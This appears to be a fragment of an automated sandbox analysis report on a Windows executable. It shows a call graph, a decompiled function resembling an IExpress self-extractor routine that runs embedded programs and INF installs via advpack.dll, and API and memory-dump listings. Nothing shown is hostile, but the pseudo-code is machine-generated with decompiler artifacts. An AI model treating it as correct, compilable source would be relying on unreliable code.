3118->3114 3118->3116 3118->3117 3210 a03210 3211 a03227 3210->3211 3235 a0328e EndDialog 3210->3235 3212 a033e2 GetDesktopWindow 3211->3212 3213 a03235 3211->3213 3215 a043d0 11 API calls 3212->3215 3216 a03239 3213->3216 3218 a0324c 3213->3218 3219 a032dd GetDlgItemTextA 3213->3219 3217 a033f1 SetWindowTextA SendDlgItemMessageA 3215->3217 3217->3216 3220 a0341f GetDlgItem EnableWindow 3217->3220 3221 a03251 3218->3221 3222 a032c5 EndDialog 3218->3222 3225 a032fc 3219->3225 3242 a03366 3219->3242 3220->3216 3221->3216 3223 a0325c LoadStringA 3221->3223 3222->3216 3226 a03294 3223->3226 3227 a0327b 3223->3227 3224 a044b9 20 API calls 3224->3216 3230 a03331 GetFileAttributesA 3225->3230 3225->3242 3248 a04224 LoadLibraryA 3226->3248 3231 a044b9 20 API calls 3227->3231 3233 a0337c 3230->3233 3234 a0333f 3230->3234 3231->3235 3232 a032a5 SetDlgItemTextA 3232->3216 3232->3227 3236 a0658a CharPrevA 3233->3236 3237 a044b9 20 API calls 3234->3237 3235->3216 3238 a0338d 3236->3238 3239 a03351 3237->3239 3240 a058c8 27 API calls 3238->3240 3239->3216 3241 a0335a CreateDirectoryA 3239->3241 3243 a03394 3240->3243 3241->3233 3241->3242 3242->3224 3243->3242 3244 a033a4 3243->3244 3245 a033c7 EndDialog 3244->3245 3246 a0597d 34 API calls 3244->3246 3245->3216 3247 a033c3 3246->3247 3247->3216 3247->3245 3249 a04246 GetProcAddress 3248->3249 3252 a043b2 3248->3252 3250 a043a4 FreeLibrary 3249->3250 3251 a0425d GetProcAddress 3249->3251 3250->3252 3251->3250 3253 a04274 GetProcAddress 3251->3253 3254 a044b9 20 API calls 3252->3254 3253->3250 3255 a0428b 3253->3255 3256 a0329d 3254->3256 3257 a04295 GetTempPathA 3255->3257 3262 a042e1 3255->3262 3256->3216 3256->3232 3258 a042ad 3257->3258 3258->3258 3259 a042b4 CharPrevA 3258->3259 3260 a042d0 CharPrevA 3259->3260 3259->3262 3260->3262 3261 a04390 FreeLibrary 3261->3256 3262->3261 3263 a04a50 3264 a04a66 3263->3264 3265 a04a9f ReadFile 3263->3265 3266 a04abb 3264->3266 3267 a04a82 memcpy 3264->3267 3265->3266 3267->3266 3268 
a03450 3269 a034d3 EndDialog 3268->3269 3270 a0345e 3268->3270 3271 a0346a 3269->3271 3272 a0349a GetDesktopWindow 3270->3272 3276 a03465 3270->3276 3273 a043d0 11 API calls 3272->3273 3274 a034ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a0348c EndDialog 3275->3271 3276->3271 3276->3275

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A03BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0xa09124 =  *0xa09124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0xa08a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0xa08c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E00A0468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00A01AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00A06CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00A03FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0xa08580;
                                                                                                                                                                                                                                            													if( *0xa08580 != 0) {
                                                                                                                                                                                                                                            														E00A02267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0xa08180;
                                                                                                                                                                                                                                            											if( *0xa08180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0xa09124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa09a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00A06495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa08a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0xa09a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0xa08a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0xa09154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0xa091e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0xa08a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0xa09a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0xa08d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0xa09a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0xa0a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0xa09124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa09a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa08a20;
                                                                                                                                                                                                                                            										if( *0xa08a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E00A0202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E00A0468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa08c42;
                                                                                                                                                                                                                                            									if( *0xa08c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0xa08a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A0468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A0468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00A01781( &_v276, 0x104, _t130, 0xa08c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E00A0468F(_t130, 0xa09a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a03c19
                                                                                                                                                                                                                                            0x00a03c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c30
                                                                                                                                                                                                                                            0x00a03c39
                                                                                                                                                                                                                                            0x00a03c40
                                                                                                                                                                                                                                            0x00a03d13
                                                                                                                                                                                                                                            0x00a03d15
                                                                                                                                                                                                                                            0x00a03d21
                                                                                                                                                                                                                                            0x00a03d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c4f
                                                                                                                                                                                                                                            0x00a03c56
                                                                                                                                                                                                                                            0x00a03c60
                                                                                                                                                                                                                                            0x00a03c65
                                                                                                                                                                                                                                            0x00a03c77
                                                                                                                                                                                                                                            0x00a03c78
                                                                                                                                                                                                                                            0x00a03c7c
                                                                                                                                                                                                                                            0x00a03c7e
                                                                                                                                                                                                                                            0x00a03c82
                                                                                                                                                                                                                                            0x00a03c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c7c
                                                                                                                                                                                                                                            0x00a03c67
                                                                                                                                                                                                                                            0x00a03c69
                                                                                                                                                                                                                                            0x00a03c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03c58
                                                                                                                                                                                                                                            0x00a03c58
                                                                                                                                                                                                                                            0x00a03c6e
                                                                                                                                                                                                                                            0x00a03c6e
                                                                                                                                                                                                                                            0x00a03c87
                                                                                                                                                                                                                                            0x00a03c89
                                                                                                                                                                                                                                            0x00a03d4d
                                                                                                                                                                                                                                            0x00a03d4f
                                                                                                                                                                                                                                            0x00a03d50
                                                                                                                                                                                                                                            0x00a03d52
                                                                                                                                                                                                                                            0x00a03d9e
                                                                                                                                                                                                                                            0x00a03da8
                                                                                                                                                                                                                                            0x00a03daf
                                                                                                                                                                                                                                            0x00a03db4
                                                                                                                                                                                                                                            0x00a03db6
                                                                                                                                                                                                                                            0x00a03f4d
                                                                                                                                                                                                                                            0x00a03f4d
                                                                                                                                                                                                                                            0x00a03f4f
                                                                                                                                                                                                                                            0x00a03f56
                                                                                                                                                                                                                                            0x00a03f57
                                                                                                                                                                                                                                            0x00a03f58
                                                                                                                                                                                                                                            0x00a03f63
                                                                                                                                                                                                                                            0x00a03f63
                                                                                                                                                                                                                                            0x00a03dbc
                                                                                                                                                                                                                                            0x00a03dc0
                                                                                                                                                                                                                                            0x00a03dc2
                                                                                                                                                                                                                                            0x00a03de6
                                                                                                                                                                                                                                            0x00a03de6
                                                                                                                                                                                                                                            0x00a03de8
                                                                                                                                                                                                                                            0x00a03f0b
                                                                                                                                                                                                                                            0x00a03f0b
                                                                                                                                                                                                                                            0x00a03f0f
                                                                                                                                                                                                                                            0x00a03f13
                                                                                                                                                                                                                                            0x00a03f15
                                                                                                                                                                                                                                            0x00a03f1a
                                                                                                                                                                                                                                            0x00a03f1c
                                                                                                                                                                                                                                            0x00a03f46
                                                                                                                                                                                                                                            0x00a03f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f47
                                                                                                                                                                                                                                            0x00a03f1e
                                                                                                                                                                                                                                            0x00a03f1f
                                                                                                                                                                                                                                            0x00a03f25
                                                                                                                                                                                                                                            0x00a03f26
                                                                                                                                                                                                                                            0x00a03f2a
                                                                                                                                                                                                                                            0x00a03f2d
                                                                                                                                                                                                                                            0x00a03fd9
                                                                                                                                                                                                                                            0x00a03fd9
                                                                                                                                                                                                                                            0x00a03fda
                                                                                                                                                                                                                                            0x00a03fda
                                                                                                                                                                                                                                            0x00a03fe1
                                                                                                                                                                                                                                            0x00a03fe3
                                                                                                                                                                                                                                            0x00a03fe3
                                                                                                                                                                                                                                            0x00a03fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03fe8
                                                                                                                                                                                                                                            0x00a03f33
                                                                                                                                                                                                                                            0x00a03f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03f37
                                                                                                                                                                                                                                            0x00a03dee
                                                                                                                                                                                                                                            0x00a03dee
                                                                                                                                                                                                                                            0x00a03df5
                                                                                                                                                                                                                                            0x00a03fad
                                                                                                                                                                                                                                            0x00a03fb9
                                                                                                                                                                                                                                            0x00a03fc2
                                                                                                                                                                                                                                            0x00a03fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03fc8
                                                                                                                                                                                                                                            0x00a03dfb
                                                                                                                                                                                                                                            0x00a03dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03e03
                                                                                                                                                                                                                                            0x00a03e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03e15
                                                                                                                                                                                                                                            0x00a03e17
                                                                                                                                                                                                                                            0x00a03e19
                                                                                                                                                                                                                                            0x00a03f94
                                                                                                                                                                                                                                            0x00a03fa4
                                                                                                                                                                                                                                            0x00a03f7c
                                                                                                                                                                                                                                            0x00a03f80
                                                                                                                                                                                                                                            0x00a03d48
                                                                                                                                                                                                                                            0x00a03c03
                                                                                                                                                                                                                                            0x00a03be2
                                                                                                                                                                                                                                            0x00a03be7
                                                                                                                                                                                                                                            0x00a03bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A03C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A03CDC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A08C42), ref: 00A03D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A03E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A08C42), ref: 00A03EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A08C42), ref: 00A03F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A08C42), ref: 00A03F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A08C42), ref: 00A03F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A08C42), ref: 00A03F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A08C42), ref: 00A03F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A08C42), ref: 00A03FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
